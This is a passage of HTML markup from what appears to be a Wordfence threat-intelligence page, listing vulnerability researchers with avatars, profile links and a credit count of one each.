				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a6b5fa3452b966ebfba668f89b1b6c30.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a6b5fa3452b966ebfba668f89b1b6c30"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiago-ventura" target="_blank" rel="noopener">Tiago Ventura</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c8efd9cb349ced935be3ed3cedba2027.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c8efd9cb349ced935be3ed3cedba2027"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gidget-smith" target="_blank" rel="noopener">gidget smith</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sybre-waaijer" target="_blank" rel="noopener">Sybre Waaijer</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5e3b56b2c8ec6a4e263430c3d1595cb9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e3b56b2c8ec6a4e263430c3d1595cb9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kta1kri" target="_blank" rel="noopener">kta1kri</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener">0xzenko</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/97a1f88460217867f45b925b3af1bb6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="97a1f88460217867f45b925b3af1bb6a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener">Muhammad Yudha &#8211; DJ</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1d0d9e663e94d9a4c2a76293e3f9489a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1d0d9e663e94d9a4c2a76293e3f9489a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/william-honner-2" target="_blank" rel="noopener">William Honnér</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c02b90fc5c8f1415e07705b0e258922.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c02b90fc5c8f1415e07705b0e258922"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/claudio-marchesini-2" target="_blank" rel="noopener">Claudio Marchesini</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c4d4f022dc9a23568fb89d3b328e6cb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4d4f022dc9a23568fb89d3b328e6cb2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener">Ryan Fabella</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/552d5c3af16be37b5afe38403782c049.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="552d5c3af16be37b5afe38403782c049"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jetpack" target="_blank" rel="noopener">Jetpack</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d3ac8184459e40bb403a72d7723b334b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d3ac8184459e40bb403a72d7723b334b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/murlocmrglwglwgl" target="_blank" rel="noopener">murloc.mrglwglwgl</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c2dae9339cb7a7417b7eedcaf09ddf9e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2dae9339cb7a7417b7eedcaf09ddf9e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener">Suhayb Ahmed</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/79ed370a05dae7cb22b4e00d79829131.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79ed370a05dae7cb22b4e00d79829131"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener">Morato Antoine</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6a1e4196aabd8945a4c15841a6a23df4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a1e4196aabd8945a4c15841a6a23df4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitefalcon" target="_blank" rel="noopener">WhiteFalcon</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7275b0fce42b2214965214f9122521b2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7275b0fce42b2214965214f9122521b2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mael-martin" target="_blank" rel="noopener">Mael MARTIN</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c2fee5a91266c9a327e04055ee576412.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2fee5a91266c9a327e04055ee576412"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/othmane-el-ayadi" target="_blank" rel="noopener">Othmane EL AYADI</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f3e148f2a544c8a60d6a0362d2cbc870.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3e148f2a544c8a60d6a0362d2cbc870"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amirsun" target="_blank" rel="noopener">AmirSUN</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/07862803660450951341d2b3ae95c50f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="07862803660450951341d2b3ae95c50f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kahlon" target="_blank" rel="noopener">Adam Kahlon</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f5eda53e33510f9c9058aa73135ae3a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f5eda53e33510f9c9058aa73135ae3a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sorin-vasile" target="_blank" rel="noopener">sorin vasile</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3582a1289bcb5d25fed1a2d8d4b55187.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3582a1289bcb5d25fed1a2d8d4b55187"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michele-genito" target="_blank" rel="noopener">Michele Genito</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8d90952f7631b32dd1745870eb5adb6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8d90952f7631b32dd1745870eb5adb6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/d4ngvn" target="_blank" rel="noopener">d4ngvn</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4aba337ae4f69efc227bbee54dacad49.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4aba337ae4f69efc227bbee54dacad49"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nikola-kojic" target="_blank" rel="noopener">Nikola Kojic</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c17f4b959c97acbb86873b2ce6313fef.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c17f4b959c97acbb86873b2ce6313fef"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiang-cy" target="_blank" rel="noopener">Jiang CY</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6803b4e2b36c156a84f137891fb567ea.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6803b4e2b36c156a84f137891fb567ea"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sushi-com-abacate" target="_blank" rel="noopener">Sushi Com Abacate</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b879437258152fc3023ac0a0d84bf29e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b879437258152fc3023ac0a0d84bf29e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yck" target="_blank" rel="noopener">yck</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4f452700087bd7ca7afef13544009622.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f452700087bd7ca7afef13544009622"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sergei-pro" target="_blank" rel="noopener">Sergei Pro</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d1cd29932f4aa057b73e3e1d430a928b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1cd29932f4aa057b73e3e1d430a928b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/labda" target="_blank" rel="noopener">Labda</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3e1f272565d9a00d35ec564d999687a0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3e1f272565d9a00d35ec564d999687a0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaskaranjeet-singh" target="_blank" rel="noopener">Jaskaranjeet Singh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/36cf834ca67acba525ff5451eb6a00a2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="36cf834ca67acba525ff5451eb6a00a2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarpeg007" target="_blank" rel="noopener">TarPeg007</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/30be710f698d639149a73105e793c201.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="30be710f698d639149a73105e793c201"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/n4kk0" target="_blank" rel="noopener">Naoya Takahashi (nakko)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/edae1e57a627ce0f46652fcd0e2d5a81.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="edae1e57a627ce0f46652fcd0e2d5a81"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rinesa-krasniqi" target="_blank" rel="noopener">Rinesa Krasniqi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit) (nhienit)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e6f5e1b75503b4a4d0813e7779c3bbc1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e6f5e1b75503b4a4d0813e7779c3bbc1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/braintx" target="_blank" rel="noopener">braintx</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2da91845a89d34ab2895d3fb12f4464f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2da91845a89d34ab2895d3fb12f4464f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/guillermo-alvarez-fernandez" target="_blank" rel="noopener">Guillermo Álvarez Fernández</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/55478b939c5cdb4a8cfa65ea7f5081fe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="55478b939c5cdb4a8cfa65ea7f5081fe"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-minaruzzaman-shovon" target="_blank" rel="noopener">Md. Minaruzzaman Shovon</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8c6c59977c13c76649d0344274b8644c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8c6c59977c13c76649d0344274b8644c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sander-horsman" target="_blank" rel="noopener">Sander Horsman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/38acd6ff342d0c9619b2f9ace105c04a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="38acd6ff342d0c9619b2f9ace105c04a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-fiocchi" target="_blank" rel="noopener">Andrea Fiocchi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d38c2bce8856249cf398ccf5a50ebe63.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d38c2bce8856249cf398ccf5a50ebe63"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener">TruongLV1 From FPT Night Wolf</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6eef6582da5a2797d89765abc3b43da9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6eef6582da5a2797d89765abc3b43da9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ivaylo-atanassov" target="_blank" rel="noopener">Ivaylo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/102b842b1c34f4d8405d7e3bec52a813.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="102b842b1c34f4d8405d7e3bec52a813"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/samuele-santonicola" target="_blank" rel="noopener">Samuele Santonicola</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e7f560ae3c1ec62624c1faba47f48d38.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e7f560ae3c1ec62624c1faba47f48d38"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryan-zegar" target="_blank" rel="noopener">Ryan Zegar</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0102fd7126a849e8c689687f1e61ce46.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0102fd7126a849e8c689687f1e61ce46"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kitch-global" target="_blank" rel="noopener">Kitch</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4b60e19265d71fc1776214f549aed590.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b60e19265d71fc1776214f549aed590"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johan-buenavida" target="_blank" rel="noopener">Johan Buenavida</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1a0cd573e20faadd1c36717e9c6511d3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a0cd573e20faadd1c36717e9c6511d3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hei-lai-sze" target="_blank" rel="noopener">HEI LAI SZE</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9e8c4676e82018ccf86cc684191f1e94.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9e8c4676e82018ccf86cc684191f1e94"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener">RIA Labs</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f6283e349b51aae510411a5b242f1c0d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f6283e349b51aae510411a5b242f1c0d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-mungah" target="_blank" rel="noopener">Brian Mungai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d096019bcc819bd2439528b80efa04cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d096019bcc819bd2439528b80efa04cf"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uhcna" target="_blank" rel="noopener">uhcna</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d2651b24e5b91bdd5426668fea66f365.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2651b24e5b91bdd5426668fea66f365"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kishan-vyas" target="_blank" rel="noopener">Kishan Vyas</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0203e07dd2cfa312f294f9391bdec1e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0203e07dd2cfa312f294f9391bdec1e8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener">LevinityCyber</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b18e99e14d7f2de268d5197dd1571353.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b18e99e14d7f2de268d5197dd1571353"><br />
